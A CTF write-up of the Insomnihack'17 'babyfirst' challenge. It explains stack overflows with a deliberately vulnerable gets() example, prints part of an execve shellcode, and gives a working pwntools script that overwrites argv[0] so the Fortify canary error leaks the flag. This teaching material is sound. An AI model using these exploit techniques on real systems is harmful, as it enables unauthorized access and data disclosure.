A journey into stack smashing
This is a write-up on stack overflow and cracking; it is a tale of struggle and despair, with a bright ending.
With hmil, we attempted the first crackme challenge at Insomnihack'17. We were new to the topic, and only slightly knowledgeable in assembly. It took several hours to finally fail at this challenge, which was only solved days later. Yet, surprisingly, this wasn't a hard puzzle: understanding the topic was the challenging part. Sail with us towards the solution!
An unusual challenge
Scenario. You start with two things: a network address where a program runs (you can connect via ssh and interact with it), and the binary of that program, babyfirst. The latter indicates that we will probably need to do something with that binary, as opposed to directly trying injections on the remote instance; plus, it is natural to start by analyzing the offline material we are given.
1 2 3 4
$ file babyfirst babyfirst: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, \ interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, \ BuildID[sha1]=9d979aeeb04a0f92bbc663f35db9744b3318611a, stripped
As expected, it is a Unix executable [1] for Intel architecture x86. We run readelf -a babyfirst which returns a lot of information, but few really interesting; We use objdump to get a peak into the assembly code:
1
2
3
4
5
6
7
8
9
10
11
12
$ objdump -d ./babyfirst
...
Disassembly of section .init:
0000000000400700 <.init>:
400700: 48 83 ec 08 sub $0x8,%rsp
400704: 48 8b 05 cd 18 20 00 mov 0x2018cd(%rip),%rax # 601fd8 <stdout@@glibc_2.2.5-0x48>
40070b: 48 85 c0 test %rax,%rax
40070e: 74 05 je 400715 <stdout@@glibc_2.2.5-0x20190b>
400710: e8 53 00 00 00 callq 400768 <stdout@@glibc_2.2.5-0x2018b8>
400715: 48 83 c4 08 add $0x8,%rsp
400719: c3 retq
...
Ugh... I hope we won't have to understand the source from those instructions only. Almost as a reflex, we ran strings .\babyfirst, hoping for some low-hanging fruits, but without success. Ok, let's try to run the program.
1 2 3 4 5 6 7 8
$ ./babyfirst Can't read the flag file! $ strings babyfirst | grep flag flag.txt Can't read the flag file! $ echo "ninjaaaa!" > flag.txt
This program reads a file flag.txt which looks darn promising. Locally, we create this file with dummy contents, but on the server it contains what we want. We proceed with the execution:
1 2 3 4 5 6 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 16 37 38 39 40 41 42 43
$ ./babyfirst Your name please? ninja Your last wish before dying? johncena __^__^___^___^__^__ ___/__ ========= __\___ _/___ \___________/ ___\_ _^_^_^__ _^_ < /< < < < < > > > > >\ > _^_ __^_^_^_ /|| ^ ^ ^ |v| ^ \ /____________ = === = ____________\ / ^ |v| ^ ^ ^ ||\ /_|| ^ ^ ^ ||| ^ | _/__/__/__/___\_______/___\__\__\__\_ | ^ ||| ^ ^ ^ ||_\ /__|| ^ ^ ^ ||| ^ |-------| \___________________/ | |-------| ^ ||| ^ ^ ^ ||__\ <| _|| ^ ^ ^ ||| ^ | | | | \_________________/ | | | | ^ ||| ^ ^ ^ ||_ |> <| _|| ||| | | | | \_______________/ | | | | | ||| ||_ |> <| __|| v v v ||| v |_|__|__| | |__|__|_| v ||| v v v ||__ |> \ _|| v v v ||| v |_|__|__| INS{********} |__|__|_| v ||| v v v ||_ / \ || v v v ||| v | | | | | v ||| v v v || / \||_v_v_v__|^|_v_/ <\ < < < > > > /> \_v_|^|__v v v_||/ \_________|__/ \___________ ___________/ \_________|__/ |______|__| \________/ _________ \_________/ |______|__| |________|__| \_________/ \__________/ |________|__| /__________|__\ \_____ \_________/ _____/ /__________|__\ |__ __ ____|_ | \__| _______ |__/ |__ __ ____|_ | _|______________|__|_ \____/ | \____/ _| || _ || |_ <| < < < > > |> |> \_________|_/ \ | || | | || | / | | |___|_| \| || | | || |/ <| < < < > > |> |> |___|_| |_____ - _____| | | | |___|_| |_| _| |_ |_| <| < < < > > |> |> __|___|_|__ |_________________| | | | ___/___________\___ |_______________| <| < < < > > > |> __/\__/\__/___/\__/\__/\__/\__\__/\__/\__ |___||___||___| |__________________|__| /____________ /\ /\ /\ ____________\ \___________________/ /__^__^__^___\ /\ _____ /\ /___^__^__^__\ \-------------/ </__^__^__^__^__\===/__^__\===/__^__^__^__^__\> \___________/ <|__^__^__^__^__^__^____^____^__^__^__^__^__^__|> <| _v__v__v__v__v__v____ v ____v__v__v__v__v__v_ |> <|__v__v__v__v__v__v____v____v__v__v__v__v__v__|> <\__v__v__v__v__v__v___v___v__v__v__v__v__v__/> \__v__v__v__v__v__v__v__v__v__v__v__v__v__/ Welcome to the rise of the machines ninja Are you ready to face us!??
Let's take some time to appreciate this beautiful ascii-art.
...
Yes, so we are asked twice to type some input, then a menacing robot is displayed. No mention of "right" or "wrong" answers; if we input the content of flag.txt in either one of the questions, nothing different happens. If we change the contents of flag.txt, we notice that the number of stars on the line INS{********} changes. So there is a function that reads the flag, but instead of simply displaying, this function replaces the chars by * beforehand. So close... (side note: by running the remote program, we learn the length of the real flag; it's too long to be bruteforced, of course).
We try to input a long string of chars:
1 2 3 4 5 6 8 9 10 11 12 13 14 15
$ ./babyfirst Your name please? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Your last wish before dying? bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb [...robot ascii-art...] Welcome to the rise of the machines aaaaaa... Are you ready to face us!?? *** stack smashing detected ***: ./babyfirst terminated ======= Backtrace: ========= /lib64/libc.so.6(+0x791fb)[0x7fd6144621fb] /lib64/libc.so.6(__fortify_fail+0x37)[0x7fd614503187] ... [1] 21199 abort (core dumped) ./babyfirst
Interesting! we managed to make the program crash, and with a verbose error. In particular, *** stack smashing detected *** is printed *after* printing the robot; so some code is still executed before crashing.
The stack and its mysteries
The stack is a part of a program's memory (another well known part is the heap). It is notably used to keep track of the return point (the return address) after running a subroutine; plus, the data used locally by a function is usually written on the stack. When the program does not sanitize inputs (e.g., when size checks are not done correctly), it is sometimes possible to deviate from the normal execution flow. The well-known attack is to inject shellcode via one input of the program, and then override the instruction pointer to execute the injected code.
The interesting behavior can be demonstrated with this simple C program:
1 2 3 4 5 6 8 9 10 11 12 13 14 15 16
$ cat example.c #include<stdio.h> void secret() { char buff[8]; gets(buff); //no size check } int main() { printf("There is no spoon."); secret(); return 0; }
We compile this with gcc example.c -o example, and take a look at the assembly code:
1 2 3 4 5 6 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| this is the beginning of | every function | | this is the ↖printf() | | this is the call to ↖secret() | | this is the beginning of | every function | this ↖allocates memory | on the stack | | this is the call to ↖gets() |
$ gdb example pwndbg> disassemble main 0x00400562 <+0> : push rbp 0x00400563 <+1> : mov rbp,rsp 0x00400566 <+4> : mov edi,0x400620 ; "There is no spoon." 0x0040056b <+9> : mov eax,0x0 0x00400570 <+14>: call 0x400430 <printf@plt> 0x00400575 <+19>: mov eax,0x0 0x0040057a <+24>: call 0x400546 <secret> 0x0040057f <+29>: mov eax,0x0 0x00400584 <+34>: pop rbp 0x00400585 <+35>: ret pwndbg> disassemble secret 0x00400546 <+0> : push rbp 0x00400547 <+1> : mov rbp,rsp 0x0040054a <+4> : sub rsp,0x10 0x0040054e <+8> : lea rax,[rbp-0x10] 0x00400552 <+12>: mov rdi,rax 0x00400555 <+15>: mov eax,0x0 0x0040055a <+20>: call 0x400440 <gets@plt> 0x0040055f <+25>: nop 0x00400560 <+26>: leave 0x00400561 <+27>: ret
Here we use the excellent pwndbg [2] as an "upgrade" to gdb.
If we analyze the stack right after the call instruction at ↖main<+24>, we see that the call pushed the return address 0x40057f on top of the stack :
1 2 3
00:0000│ 0x7fffffffd968 —▸ ↖0x40057f (main+29) 01:0008│ 0x7fffffffd970 —▸ ; irrelevant 02:0010│ 0x7fffffffd978 —▸ ; irrelevant
This will be used by the ret instruction at ↖secret<+27>, which will pop this address into the instruction pointer EIP, causing the execution to resume at ↖main<+29>. That's how functions are coded in assembly!
Let us continue with our demonstration. We are now executing ↖secret<+0>. Let's fast-foward after the two instructions sub/lea, which allocate space on the stack (the equivalent of char buff[8];). Then, the stack is :
1 2 3 4 5 6
00:0000│ 0x7fffffffd950 —▸ 0x0 01:0008│ 0x7fffffffd958 —▸ ; irrelevant 02:0010│ 0x7fffffffd960 —▸ ; irrelevant 03:0018│ 0x7fffffffd968 —▸ 0x40057f (main+29) 04:0020│ 0x7fffffffd970 —▸ ; irrelevant 05:0028│ 0x7fffffffd978 —▸ ; irrelevant
Finally, let's input ninja!! in the program. This is smaller than 8 characters and will not overflow:
1 2 3 4 5 6
00:0000│ 0x7fffffffd950 —▸ 0x002121616A6E696E ; \0!!ajnin 01:0008│ 0x7fffffffd958 —▸ ; irrelevant 02:0010│ 0x7fffffffd960 —▸ ; irrelevant 03:0018│ 0x7fffffffd968 —▸ 0x40057f (main+29) 04:0020│ 0x7fffffffd970 —▸ ; irrelevant 05:0028│ 0x7fffffffd978 —▸ ; irrelevant
A longer input would overflow in the higher-addresses of the stack. The example below is with the input ninja!ninja!:
1 2 3 4 5 6
00:0000│ 0x7fffffffd950 —▸ 0x6E21616A6E696E ; n!ajnin 01:0008│ 0x7fffffffd958 —▸ 0x??0021616A6E69 ; \0!ajni 02:0010│ 0x7fffffffd960 —▸ ; irrelevant 03:0018│ 0x7fffffffd968 —▸ 0x40057f (main+29) 04:0020│ 0x7fffffffd970 —▸ ; irrelevant 05:0028│ 0x7fffffffd978 —▸ ; irrelevant
If we manage to overwrite ↖0x40057f by a value X, it will get loaded into the instruction pointer by ret as seen before, allowing us to "jump" the execution to the address X. We could even execute our own code, if instead of ninja!ninja! we wrote assembly instructions.
Down the rabbit hole
Let's try to disassemble our babyfirst using IDA [4]. Here you can experience the real fun: if you run Linux, you'll need not only to create a Windows virtual machine for IDA, but also another Linux virtual machine if you want to run this (untrusted) program in a safe environment. IDA is shipped with a debug server, that needs to run on your isolated Linux VM; IDA will contact this server (from the Window VM) for running the program.
Depending on your assembly level, exploring the code in IDA can take you minutes or hours. It took us hours. Luckily, we'll just state that "this exercise is left for the curious reader" and move on. Below is the (simplified) main function:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
mov edi, offset aYourNamePlease ; "Your name please?" call puts ... mov esi, 20h call sub_400930 ; We checked, this function read stdin into memory --> readStdIn() mov edx, 20h ... call __strcpy_chk mov edi, offset aYourLastWishBe ; "Your last wish before dying?" call puts ... mov esi, 190h call sub_400930 ; readStdIn() mov edx, 190h ... call __strcpy_chk
In this extract, several points stand out. First, the different values written in ESI, 20h and 190h; our intuition tells us that this is the allowed size of input of the readStdIn() method below. Then, more worrying, we read __strcpy_chk. What madness is that ? It's a protection against stack overflow [5]. That sounds bad, yet we might still be lucky somewhere else.
The shellcode that never was
We tried our original idea: injecting a shellcode in one of the input, deriving the execution flow to execute it, to finally running something like cat flag.txt though the remote shell.
We were comforted in this idea because of the dual input
- Input 1 of length 20h = 32 bytes
- Input 2 of length 190h = 400 bytes
Those sizes seemed very arbitrary, especially since those input were *not used* in any checks done by the program (hence there was no execution path displaying the flag), plus having two inputs seemed to suggest that one was for injecting the shellcode, while the second one was for injecting the code to jump to the shellcode.
For finding a shellcode, we relied on Exploit-Database [8], an awesome tool which you can clone and use offline:
1 2 3 4 5 6 7 8 9 10 11 12
$ ./searchsploit shellcode linux/x86 Exploit Title | Path --------------------------------------------------------------------------------------- Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) | lin_x86/shellcode/38088.c Linux/x86 - chroot & standart Shellcode (66 bytes) | lin_x86/shellcode/13415.c Linux/x86 - setreuid/execve Shellcode (31 bytes) | lin_x86/shellcode/13417.c Linux/x86 - iptables -F Shellcode (45 bytes) | lin_x86/shellcode/13432.c ... $ cat lin_x86/shellcode/38088.c ... char sh[]="\xb0\x46\x31\xc0\xcd\x80\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\x31\xc9[...]"; ...
We picked a shellcode that was small enough to fit in both inputs. By copy-pasting it into our running program, we checked that the shellcode was indeed copied in memory, at a fixed address (it seems that there is no ASLR). It only remains to derive the execution flow to this address. As seen in the section above, this should be a simple matter of overwriting the return address.
Unfortunately, every single one of our attempts triggers a program crash, *** stack smashing detected***, and we never execute the shellcode. We noticed the presence of a test, at the end of the main function:
1 2 3 4 5 6 8 9
... .text:0000000000400BD4 038 xor eax, eax .text:0000000000400BD6 038 call printRobot .text:0000000000400BDB 038 mov rax, [rsp+38h+var_10] .text:0000000000400BE0 038 xor rax, fs:28h .text:0000000000400BE9 038 jnz short loc_400B5F ; prints "stack smashing detected" \ .text:0000000000400BEB 038 add rsp, 38h ; and exits .text:0000000000400BEF 000 retn
So we jump to ↖loc_400B5F if the content of ↖[rsp+38h+var_10] differs from the content of ↖fs:28h, which changes at every run. Moreover, the tested address is just *above* the return address in the stack, meaning that we can't overwrite the return address without touching it.
This indeed sounds a lot like a stack smashing protection... after a bit of reading on Fortify [6] (visible in the trace), we realize that it is a GCC built-in protection against stack overflow.
Alright, this executable is somewhat protected. We run checksec on it:
1 2 3
$ checksec ./babyfirst RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Full RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes
In two sentences, RELRO reorders segments of the executable to make some sections read-only; NX is the No-eXecute bit that prevent executing code in some segments, and finally RPATH/RUNPATH test the presence of custom path for loading libraries. The value at ↖[rsp+38h+var_10] is a Canary (the story of this name is interesting [9]).
Conclusion: It seems unlikely to find a flaw in a security feature designed against stack smashing. But more fundamentally, the NX bit is set, and probably our shellcode would not execute even without the canary. Dead end.
Just one extra byte
While debugging the program, we realized something odd. Three memory chunks are allocated on the heap:
- For storing the password read from flag.txt
- For storing the first input of length 20h = 32 bytes
- For storing the second input of length 190h = 400 bytes
More specifically, they are always allocated at the same positions on the heap (there's no ASLR), and follow this pattern :
1 2 3 4 5 6
[heap]:00CE5A94 —▸ ; input 2 ... [heap]:00CE6220 —▸ ; input 1 [heap]:00CE6240 —▸ ; content of flag.txt ...
This looks promising ! Have a look above; when the program exits normally, it prints the first input again :
42
Welcome to the rise of the machines ninja
In memory, what follow input 1 is the pass. We know printf prints until finding a null byte 0x00; suppose we could remove/overwrite this null byte, we would expect to see:
42
Welcome to the rise of the machines ninjaSECRET_FLAG
Unfortunately, the function used to get the inputs is fgets (visible in the assembly), which always adds the null-byte termination [7]. Dead end n°2.
Bug #562614
The solution came while looking for ways to bypass our friend *** stack smashing detected ***. In particular, we found that it was a feature of Fortify, and by mere luck, discovered a (known) weakness in Fortify [10]. To be more precise, it's an information leakage. Let's go back to the stack trace :
1 2 3 4 5 6 8 9 10 11 12 13 14 15
$ ./babyfirst Your name please? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Your last wish before dying? bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb [...robot ascii-art...] Welcome to the rise of the machines aaaaaa... Are you ready to face us!?? *** stack smashing detected ***: ./babyfirst terminated ======= Backtrace: ========= /lib64/libc.so.6(+0x791fb)[0x7fd6144621fb] /lib64/libc.so.6(__fortify_fail+0x37)[0x7fd614503187] ... [1] 21199 abort (core dumped) ./babyfirst
How does fortify know this ? It actually reads from the argv array, stored in the stack somewhere down (as it is the argument of main, the first function called). Hence, the stack might look like :
1 2 3 4 5 6 7
00:0000│ 0x7fffffffd950 —▸ ; readInputs' local variable "input2" 01:0008│ 0x7fffffffd958 —▸ ; readInputs' local variable "input1" 02:0010│ 0x7fffffffd960 —▸ ; readInputs' arguments 03:0018│ 0x7fffffffd968 —▸ ; ... 04:0020│ 0x7fffffffd970 —▸ ; main's local variables 05:0028│ 0x7fffffffd978 —▸ ; main's argument argv[0] 06:0030│ 0x7fffffffd980 —▸ ; main's argument argv[1]
Let's try to simply write the address where the pass is stored in memory, and try to overwrite the ↖pointer to argv[0]. To find the flag's address, we set a specific text in flag.txt, and locate it in memory by doing text search while debugging with IDA.
At this point, we stopped writing manually the bytes in the console, and used the excellent pwntools [11] in a python script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 18
$ cat hijack.py from pwn import * addr_flag = 0x602080 # address of our flag in memory r = remote('localhost', 6666) stdout = r.recvuntil("Your name please?") r.sendline("ninja") # input 1 is useless print stdout print "----------------------------" stdout = r.recvuntil("Your last wish before dying?") exploit = p64(addr_flag)*0x190 # we fill input 2 with the address r.sendline(exploit) stdout = r.recvall() print stdout
Then, we use socat to interact with our program through sockets :
1
$ exec socat TCP-LISTEN:6666,fork,reuseaddr EXEC:./babyfirst &
1 2 3 4 5 6 7 8 9 10
$ python2 hijack.py [+] Opening connection to localhost on port 6666: Done Your name please? ---------------------------- Receiving all data *** stack smashing detected ***: FLAG{NINJUSTU} terminated [-] Receiving all data /lib64/libc.so.6(__fortify_fail+0x37)[0x7fa4f1d6c187] /lib64/libc.so.6(__fortify_fail+0x0)[0x7fa4f1d6c150] ...
Sweeeeeeeet !
Conclusion
The challenge can be validated by simply contacting the remote server instead of localhost:6666 (another benefit of using socat/pwntools). We take a deep breath, artificially blink a few times, and finally get some sleep.
Personal notes: This was supposed to be an easy challenge, revolving around a well-known trick. Yet for a first dive into assembly, it proved to be a complex and challenging puzzle; most of the time was spent on wrong directions, which in the end still helped tremendously with the general understanding of assembly. Next crackme, we'll be ready ;)
Did this help you ? Yes, this was not complete garbage
Did you waste 15 minutes of your life? We recommend this (slightly outdated) tutorial.
References :
- [1] Executable and Linkable Format
- [2] pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
- [3] x86 Assembly Guide
- [4] IDA
- [5] __strcpy_chk
- [6] difference between gcc -D_FORTIFY_SOURCE=1 and -D_FORTIFY_SOURCE=2
- [7] fgets manpage
- [8] The Exploit Database
- [9] Canaries in coal mines
- [10] Fortify information leakage
- [11] pwntools : CTF toolkit